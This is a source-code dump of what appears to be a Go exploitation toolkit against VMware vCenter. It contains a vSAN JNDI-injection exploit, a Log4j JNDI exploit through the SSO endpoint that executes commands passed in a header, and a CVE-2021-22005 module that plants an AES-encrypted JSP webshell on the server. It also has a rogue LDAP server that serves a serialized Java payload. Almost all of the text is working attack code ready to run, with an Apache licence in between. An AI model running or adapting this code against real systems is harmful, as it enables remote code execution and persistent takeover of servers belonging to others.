91dHB1dCZxdW90OywgYnIubGluZXMoKS5jb2xsZWN0KGNvbGxlY3RvcnMuam9pbmluZygmcXVvdDsKJnF1b3Q7KSkpIH0iLz4KICAgIDwvYmVhbj4KPC9iZWFucz4K" 87 | content, err := base64.StdEncoding.DecodeString(b64_str) 88 | _ = err 89 | con := string(content) 90 | xml_str := strings.Replace(con, "{cmd}", command, -1) 91 | 92 | // fmt.Println(xml_str) 93 | ioutil.WriteFile("offline_bundle.xml", []byte(xml_str), 0666) 94 | 95 | return []byte(xml_str) 96 | } 97 | 98 | func Zip_file(src string, xml_buf []byte) []byte { 99 | var buf bytes.Buffer 100 | // archive, err := os.Create(dst) //创建文件对象 101 | // if err != nil { 102 | // panic(err) 103 | // } 104 | zipWriter := zip.NewWriter(&buf) //初始化一个zip.Writer,用来将数据写入zip文件中 105 | // a, err := ioutil.ReadFile(src) 106 | // if err != nil { 107 | // panic(err) 108 | // } 109 | 110 | // f2, err := os.Open(src) //打开源文件 111 | // if err != nil { 112 | // panic(err) 113 | // } 114 | // defer f2.Close() 115 | 116 | w2, err := zipWriter.Create(src) //创建一个io.Writer 117 | if err != nil { 118 | panic(err) 119 | } 120 | //直接把源文件的内容copy到io.Writer中,即是写入到zip文件中 121 | // if _, err := io.Copy(w2, f2); err != nil { 122 | // panic(err) 123 | // } 124 | // w2.Write(a) 125 | 126 | w2.Write(xml_buf) 127 | zipWriter.Close() 128 | // _ = archive 129 | // fmt.Println(buf.Bytes()) 130 | 131 | return buf.Bytes() 132 | 133 | } 134 | 135 | func Attack(url, command string) { 136 | t1 := Generate_xml(command) 137 | t2 := Zip_file("offline_bundle.xml", t1) 138 | t3 := To_b64(t2) 139 | Upload(url, t3) 140 | time.Sleep(1) 141 | Execute(url) 142 | // fmt.Println(To_b64(t1)) 143 | } 144 | 145 | func send(url, uri, json_body string) { 146 | client := req.C() 147 | client.EnableInsecureSkipVerify() 148 | client.EnableForceHTTP1() 149 | client.SetProxyURL(Proxy_server) 150 | base := "/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService" 151 | resp, err := client.R().SetBodyJsonString(json_body).Post(url + base + uri) 152 | if err != nil { 153 | log.Fatal(err) 154 | fmt.Println("[-] Connection failure, please check network.") 155 | os.Exit(0) 156 | 157 | } 158 | if uri == "/invoke" { 159 | if resp.StatusCode == 200 { 160 | return 161 | } else { 162 | fmt.Println("[-] Exploit failure.") 163 | os.Exit(0) 164 | } 165 | } 166 | if !strings.Contains(resp.String(), "result") { 167 | fmt.Println("[-] Exploit failure.") 168 | os.Exit(0) 169 | } 170 | } 171 | 172 | func Exploit(url, payload string) { 173 | 174 | fmt.Println("[*] Sending payload...") 175 | uris := []string{"/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"} 176 | send(url, uris[0], "{\"methodInput\": [null]}") 177 | send(url, uris[1], "{\"methodInput\": [\"javax.naming.InitialContext.doLookup\"]}") 178 | send(url, uris[2], "{\"methodInput\": [\"doLookup\"]}") 179 | send(url, uris[3], fmt.Sprintf("{\"methodInput\": [[\"%s\"]]}", payload)) 180 | send(url, uris[4], "{\"methodInput\": [null]}") 181 | send(url, uris[5], "{\"methodInput\": []}") 182 | fmt.Println("[+] 发送成功.") 183 | 184 | } 185 | -------------------------------------------------------------------------------- /src/log4jcenter/log4j.go: -------------------------------------------------------------------------------- 1 | package log4jcenter 2 | 3 | import ( 4 | "crypto/tls" 5 | "fmt" 6 | "net" 7 | "os" 8 | "strings" 9 | "sync" 10 | "time" 11 | 12 | "github.com/go-resty/resty/v2" 13 | 14 | "github.com/imroc/req/v3" 15 | ) 16 | 17 | var wg sync.WaitGroup 18 | var Proxy_server = "" 19 | 20 | func rmiServer() { 21 | service := ":4398" 22 | tcpAddr, err := net.ResolveTCPAddr("tcp4", service) 23 | fmt.Println("[*] Start listen.") 24 | socket, err := net.ListenTCP("tcp", tcpAddr) 25 | if err != nil { 26 | fmt.Println("[-] error, please check if the port is occupied.") 27 | } 28 | conn, err := socket.Accept() 29 | if err != nil { 30 | fmt.Println("[-] error, please check if the port is occupied.") 31 | } 32 | data_byte := [1024]byte{} 33 | data, err := conn.Read(data_byte[:]) 34 | if err != nil { 35 | fmt.Println("[-] Failure to receive.") 36 | } 37 | _ = data 38 | if firstCheck(data_byte[:]) { 39 | fmt.Println("[+] Rmi request received") 40 | fmt.Println("[+] Log4j check success.") 41 | 42 | } else { 43 | fmt.Println("[*] A non-RMI request was received.") 44 | } 45 | conn.Close() 46 | wg.Done() 47 | } 48 | 49 | func firstCheck(data []byte) bool { 50 | // check head 51 | if data[0] == 0x4a && 52 | data[1] == 0x52 && 53 | data[2] == 0x4d && 54 | data[3] == 0x49 { 55 | // check version 56 | if data[4] != 0x00 && 57 | data[4] != 0x01 { 58 | return false 59 | } 60 | // check protocol 61 | if data[6] != 0x4b && 62 | data[6] != 0x4c && 63 | data[6] != 0x4d { 64 | return false 65 | } 66 | // check other data 67 | lastData := data[7:] 68 | for _, v := range lastData { 69 | if v != 0x00 { 70 | return false 71 | } 72 | } 73 | return true 74 | } 75 | return false 76 | } 77 | 78 | func StartScan(url string) { 79 | wg.Add(1) 80 | go rmiServer() 81 | // check_alive(url) 82 | target := strings.TrimLeft(url, "https://") 83 | local_ip := getIpAddr2(target) 84 | fmt.Println("[*] your local IP: " + local_ip) 85 | exploit(url, "rmi://"+local_ip+":4398/test") 86 | wg.Wait() 87 | } 88 | 89 | func StartExploit(url, rmiserv string) { 90 | fmt.Println("[*] Sending payload...") 91 | exploit(url, rmiserv) 92 | fmt.Println("[*] Send completed, please check.") 93 | } 94 | 95 | func check_alive(url string) { 96 | client := req.C() 97 | client.EnableForceHTTP1() 98 | client.EnableInsecureSkipVerify() 99 | client.SetProxyURL(url) 100 | client.SetTimeout(2 * time.Second) 101 | resp, err := client.R(). 102 | SetHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36").Get(url) 103 | if err != nil { 104 | fmt.Println("[-] Connection failure, please check network.") 105 | os.Exit(0) 106 | } 107 | _ = resp 108 | } 109 | 110 | func exploit(url, rmiserver string) { 111 | host := rmiserver 112 | client := req.C() 113 | client.EnableForceHTTP1() 114 | client.EnableInsecureSkipVerify() 115 | client.SetProxyURL(Proxy_server) 116 | client.SetTimeout(2 * time.Second) 117 | // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 118 | rmi_server := fmt.Sprintf("${jndi:%s}", host) 119 | myheader := map[string]string{ 120 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", 121 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 122 | "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 123 | "Accept-Encoding": "gzip, deflate", 124 | "Upgrade-Insecure-Requests": "1", 125 | "X-Forwarded-For": rmi_server, 126 | "Sec-Fetch-Mode": "navigate", 127 | "Sec-Fetch-Site": "none", 128 | "Sec-Fetch-User": "?1"} 129 | 130 | client.R(). 131 | SetHeaders(myheader). 132 | Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=") 133 | 134 | } 135 | 136 | func exec_cmd(url, rmiserver, command, cmd, uri string) (bool, string) { 137 | host := "" 138 | if rmiserver == "" { 139 | target := strings.TrimLeft(url, "https://") 140 | host = getIpAddr2(target) 141 | // fmt.Println(host) 142 | } else { 143 | host = rmiserver 144 | } 145 | 146 | client := req.C() 147 | client.EnableForceHTTP1() 148 | // client.DisableAutoReadResponse() 149 | // client.SetUnixSocket("1.sock") 150 | client.EnableInsecureSkipVerify() 151 | client.DisableAutoReadResponse() 152 | client.SetProxyURL(Proxy_server) 153 | client.SetTimeout(2 * time.Second) 154 | // client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理,burp2022.8会启用http2,导致vcenter报错403 155 | rmi_server := "" 156 | cmd = command + cmd 157 | rmi_server = fmt.Sprintf("${jndi:ldap://%s:1389%s}", host, uri) 158 | // fmt.Println(rmi_server) 159 | myheader := map[string]string{ 160 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0", 161 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", 162 | "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", 163 | "Accept-Encoding": "gzip, deflate", 164 | "Upgrade-Insecure-Requests": "1", 165 | "X-Forwarded-For": rmi_server, 166 | "Sec-Fetch-Mode": "navigate", 167 | "Sec-Fetch-Site": "none", 168 | "Sec-Fetch-User": "?1", 169 | "Cmd": cmd, 170 | } 171 | 172 | cli := resty.New().SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true}) 173 | if Proxy_server != "" { 174 | cli = cli.SetProxy(Proxy_server) 175 | } else { 176 | 177 | } 178 | 179 | resp, err := cli.R(). 180 | EnableTrace(). 181 | SetHeaders(myheader). 182 | Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=") 183 | _ = err 184 | // fmt.Println(resp.String()) 185 | 186 | // resp, err := client.R(). 187 | // SetHeaders(myheader). 188 | // Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=") 189 | // if err != nil && err == io.ErrUnexpectedEOF { 190 | // // 191 | // } else if strings.Contains(err.Error(), "NO_ERROR") { 192 | // // 193 | // } else { 194 | // log.Fatal(err) 195 | // // fmt.Println("[-] 连接失败,请检查网络.") 196 | // // os.Exit(0) 197 | // } 198 | if err != nil { 199 | // 200 | } 201 | if resp.StatusCode() == 200 { 202 | result := resp.String() 203 | result = strings.Split(result, "nmsl")[0] 204 | result = strings.TrimRight(result, "\n") 205 | // fmt.Println(resp.String()) 206 | // fmt.Println(result) 207 | // fmt.Println(1) 208 | return true, result 209 | } else { 210 | 211 | return false, "" 212 | } 213 | 214 | } 215 | 216 | func Execc(url, rmiserver, command string) { 217 | 218 | temp1, temp2 := exec_cmd(url, rmiserver, command, ";echo nmsl", "/TomcatBypass/TomcatEcho") 219 | if temp1 { 220 | fmt.Println(temp2) 221 | return 222 | } 223 | temp3, temp4 := exec_cmd(url, rmiserver, command, " && echo nmsl", "/TomcatBypass/TomcatEcho") 224 | if temp3 { 225 | fmt.Println(temp4) 226 | return 227 | } 228 | 229 | fmt.Println("[-] Exploit failure.") 230 | } 231 | 232 | func getIpAddr2(url string) string { 233 | 234 | tmp := strings.Split(url, ":") 235 | port := "" 236 | ipaddr := "" 237 | if len(tmp) > 1 { 238 | ipaddr = tmp[0] 239 | port = tmp[1] 240 | } else { 241 | ipaddr = url 242 | port = "443" 243 | } 244 | // fmt.Println(port) 245 | conn, err := net.Dial("tcp", ipaddr+":"+port) 246 | if err != nil { 247 | fmt.Println(err) 248 | return "" 249 | } 250 | localAddr := conn.LocalAddr().(*net.TCPAddr) 251 | 252 | ip := strings.Split(localAddr.String(), ":")[0] 253 | 254 | return ip 255 | } 256 | -------------------------------------------------------------------------------- /src/c_22005/c_22005.go: -------------------------------------------------------------------------------- 1 | package c_22005 2 | 3 | import ( 4 | "fmt" 5 | "github.com/imroc/req/v3" 6 | "io/ioutil" 7 | "math/rand" 8 | "os" 9 | "strings" 10 | "time" 11 | ) 12 | 13 | var user_agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Edg/80.0.361.54" 14 | var Proxy_server = "" 15 | 16 | func id_generator(add_time int64) string { 17 | var list_str = []string{} 18 | size := 6 19 | chars := "abcdefghijklmnopqrstuvwxyz" 20 | dights := "0123456789" 21 | strs := chars + dights 22 | zz := time.Now().Unix() + add_time 23 | rand.Seed(zz) 24 | 25 | a := int64(len(strs)) 26 | for i := 0; i < size; i++ { 27 | flag := rand.Int63n(a) 28 | _ = flag 29 | list_str = append(list_str, string(strs[int(flag)])) 30 | } 31 | 32 | // res := strings.Join(s, "") 33 | res := strings.Join(list_str, "") 34 | 35 | return res 36 | 37 | } 38 | 39 | func Create_agent(url, log_param, agent_name string) { 40 | 41 | target := fmt.Sprintf("%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s", url, agent_name, log_param) 42 | body := `{"manifestSpec":{}, 43 | "objectType": "a2", 44 | "collectionTriggerDataNeeded": true, 45 | "deploymentDataNeeded":true, 46 | "resultNeeded": true, 47 | "signalCollectionCompleted":true, 48 | "localManifestPath": "a7", 49 | "localPayloadPath": "a8", 50 | "localObfuscationMapPath": "a9"}` 51 | client := req.C().DisableDumpAll().DisableDebugLog() 52 | client.EnableInsecureSkipVerify() 53 | client.EnableForceHTTP1() 54 | client.SetUserAgent(user_agent) 55 | client.SetTimeout(2 * time.Second) 56 | client.SetProxyURL(Proxy_server) 57 | myheader := map[string]string{"Cache-Control": "max-age=0", 58 | "Upgrade-Insecure-Requests": "1", 59 | "User-Agent": "Mozilla/5.0", 60 | "X-Deployment-Secret": "abc", 61 | "Content-Type": "application/json", 62 | "Connection": "close"} 63 | resp, err := client.R().SetContentType("application/json"). 64 | SetHeaders(myheader). 65 | SetBody(body). 66 | Post(target) 67 | if err != nil { 68 | if strings.Contains(err.Error(), "Timeout") { 69 | 70 | } else { 71 | fmt.Println("[-] Upload failure, please check network.") 72 | os.Exit(0) 73 | } 74 | 75 | } 76 | _ = resp 77 | } 78 | 79 | func get_data(str string) string { 80 | a := strings.Replace(str, "\n", "\\n", -1) 81 | a = strings.Replace(a, "\t", " ", -1) 82 | a = strings.Replace(a, "\"", "\\\"", -1) 83 | return a 84 | 85 | } 86 | func Upload_shell(url, log_param, agent_name, wb_str string) { 87 | 88 | tarGet := fmt.Sprintf("%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s", url, agent_name, log_param) 89 | 90 | webshell := "" 91 | if len(wb_str) > 1 { 92 | webshell = wb_str 93 | } 94 | webshell = `<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>` 95 | webshell_str := str_to_escape(webshell) 96 | manifest_data := get_data(generate_manifest("/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/vs-s3rver.jsp", webshell_str)) 97 | _ = manifest_data 98 | myheader := map[string]string{"Cache-Control": "max-age=0", 99 | "Upgrade-Insecure-Requests": "1", 100 | "User-Agent": "Mozilla/5.0", 101 | "X-Deployment-Secret": "abc", 102 | "Content-Type": "application/json", 103 | "Connection": "close"} 104 | data := fmt.Sprintf("{\"contextData\": \"a3\",\"%s\":\"%s\",\"objectId\": \"a2\"}", "manifestContent", manifest_data) 105 | // fmt.Println(jsonText) 106 | client := req.C().DisableDumpAll().DisableDebugLog() 107 | client.DisableAutoDecode() 108 | client.SetTimeout(6 * time.Second) 109 | client.EnableInsecureSkipVerify() 110 | client.EnableForceHTTP1() 111 | client.SetUserAgent(user_agent) 112 | client.SetProxyURL(Proxy_server) 113 | resp, err := client.R().SetContentType("application/json"). 114 | SetHeaders(myheader). 115 | SetBody(data). 116 | Post(tarGet) 117 | if err != nil { 118 | if strings.Contains(err.Error(), "Timeout") { 119 | 120 | } else { 121 | fmt.Println("[-] Upload failure, please check network.") 122 | os.Exit(0) 123 | } 124 | } 125 | if resp.StatusCode == 201 || resp.StatusCode == 200 { 126 | 127 | fmt.Println("[+] Upload success,check Webshell...") 128 | } else { 129 | // fmt.Println(resp.StatusCode) 130 | fmt.Println("[-] Upload failure.") 131 | os.Exit(0) 132 | } 133 | 134 | } 135 | 136 | func str_to_escape(str string) string { 137 | // byte_str := []byte(str) 138 | res := "" 139 | for _, value := range str { 140 | // fmt.Print(value) 141 | // a, err := strconv.Atoi(string(value)) 142 | // _ = err 143 | s := fmt.Sprintf("\\\\u%04x", string(value)) 144 | // fmt.Println(s) 145 | res += s 146 | } 147 | 148 | return res 149 | } 150 | 151 | func generate_manifest(webshell_location, webshell string) string { 152 | ss := ` 153 | 154 | 155 | 156 | ServiceInstance 157 | 158 | 159 | content.about.instanceUuid 160 | content.about.osType 161 | content.about.build 162 | content.about.version 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | vir:VCenter 171 | 172 | 173 | 174 | ServiceInstance 175 | 184 | 185 | 186 | 187 | 188 | 189 | 190 | 191 | 192 | 193 | 194 | 195 | vir:VCenter 196 | 197 | 198 | 199 | ` 200 | _ = ss 201 | a := fmt.Sprintf(ss, webshell_location, webshell) 202 | return a 203 | } 204 | 205 | func Check(url string) { 206 | client := req.C() 207 | client.SetProxyURL(Proxy_server) 208 | client.SetTimeout(2 * time.Second) 209 | shell_url := url + "/idm/..;/" + "vs-s3rver.jsp" 210 | resp, err := client.R(). 211 | Get(shell_url) 212 | if err != nil { 213 | panic(err) 214 | } 215 | if strings.Contains(resp.String(), "root") { 216 | fmt.Println("[+] shell url: " + shell_url) 217 | 218 | } else { 219 | fmt.Println("[-] Exploit failure 0.0") 220 | } 221 | } 222 | 223 | func Test(url, filename string) { 224 | log_param := id_generator(int64(2)) 225 | agent_name := id_generator(int64(5)) 226 | Create_agent(url, log_param, agent_name) 227 | ss, err := ioutil.ReadFile(filename) 228 | if err != nil { 229 | fmt.Println("[-] Read file failure.") 230 | os.Exit(0) 231 | } 232 | s := string(ss) 233 | Upload_shell(url, log_param, agent_name, s) 234 | Check(url) 235 | } 236 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /src/log4jcenter/server.go: -------------------------------------------------------------------------------- 1 | package log4jcenter 2 | 3 | import ( 4 | "encoding/base64" 5 | "fmt" 6 | "sync" 7 | "time" 8 | 9 | "github.com/lor00x/goldap/message" 10 | ldap "github.com/vjeantet/ldapserver" 11 | ) 12 | 13 | var q sync.WaitGroup 14 | 15 | func Start_server() { 16 | 17 | //Create a new LDAP Server 18 | 19 | ldap.Logger = ldap.DiscardingLogger 20 | server := ldap.NewServer() 21 | routes := ldap.NewRouteMux() 22 | routes.Bind(handleBind) 23 | routes.Search(handleSearch) 24 | server.ReadTimeout = time.Second * 100 25 | server.Handle(routes) 26 | 27 | q.Add(1) 28 | go server.ListenAndServe(":1389") 29 | q.Wait() 30 | 31 | } 32 | 33 | func handleSearch(w ldap.ResponseWriter, m *ldap.Message) { 34 | r := m.GetSearchRequest() 35 | 36 | e := ldap.NewSearchResultEntry("") 37 | 38 | if r.BaseObject() == "TomcatBypass/TomcatEcho" { 39 | payload, _ := base64.RawStdEncoding.DecodeString("rO0ABXNyAB1vcmcuYXBhY2hlLm5hbWluZy5SZXNvdXJjZVJlZgAAAAAAAAABAgAAeHIAHW9yZy5hcGFjaGUubmFtaW5nLkFic3RyYWN0UmVmAAAAAAAAAAECAAB4cgAWamF2YXgubmFtaW5nLlJlZmVyZW5jZejGnqKo6Y0JAgAETAAFYWRkcnN0ABJMamF2YS91dGlsL1ZlY3RvcjtMAAxjbGFzc0ZhY3Rvcnl0ABJMamF2YS9sYW5nL1N0cmluZztMABRjbGFzc0ZhY3RvcnlMb2NhdGlvbnEAfgAETAAJY2xhc3NOYW1lcQB+AAR4cHNyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAV1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAGmphdmF4Lm5hbWluZy5TdHJpbmdSZWZBZGRyhEv0POER3MkCAAFMAAhjb250ZW50c3EAfgAEeHIAFGphdmF4Lm5hbWluZy5SZWZBZGRy66AHmgI4r0oCAAFMAAhhZGRyVHlwZXEAfgAEeHB0AAVzY29wZXQAAHNxAH4AC3QABGF1dGhxAH4AD3NxAH4AC3QACXNpbmdsZXRvbnQABHRydWVzcQB+AAt0AAtmb3JjZVN0cmluZ3QABng9ZXZhbHNxAH4AC3QAAXh0H3F7IiIuZ2V0Q2xhc3MoKS5mb3JOYW1lKCJqYXZheC5zY3JpcHQuU2NyaXB0RW5naW5lTWFuYWdlciIpLm5ld0luc3RhbmNlKCkuZ2V0RW5naW5lQnlOYW1lKCJKYXZhU2NyaXB0IikuZXZhbCgidmFyIGJ5dGVzID0gb3JnLmFwYWNoZS50b21jYXQudXRpbC5jb2RlYy5iaW5hcnkuQmFzZTY0LmRlY29kZUJhc2U2NCgneXY2NnZnQUFBRE1CR3dvQVRRQ1FDZ0NSQUpJS0FKRUFrd2dBbEFvQVRBQ1ZCd0JuQ2dDUkFKWUlBSmNLQUIwQW1BZ0FtUWdBbWdjQW13Z0FuQWdBakFnQW5RY0FuZ2dBbndjQW9Bc0FFZ0NoQ3dBU0FLSUlBS01LQUJvQXBBZ0FwUWNBcGdvQUdBQ25Cd0NvQ2dDcEFLb0lBS3NIQUt3SUFLMEtBQjBBcmdnQXJ3a0FJZ0N3QndDeENnQWlBTElJQUxNSUFM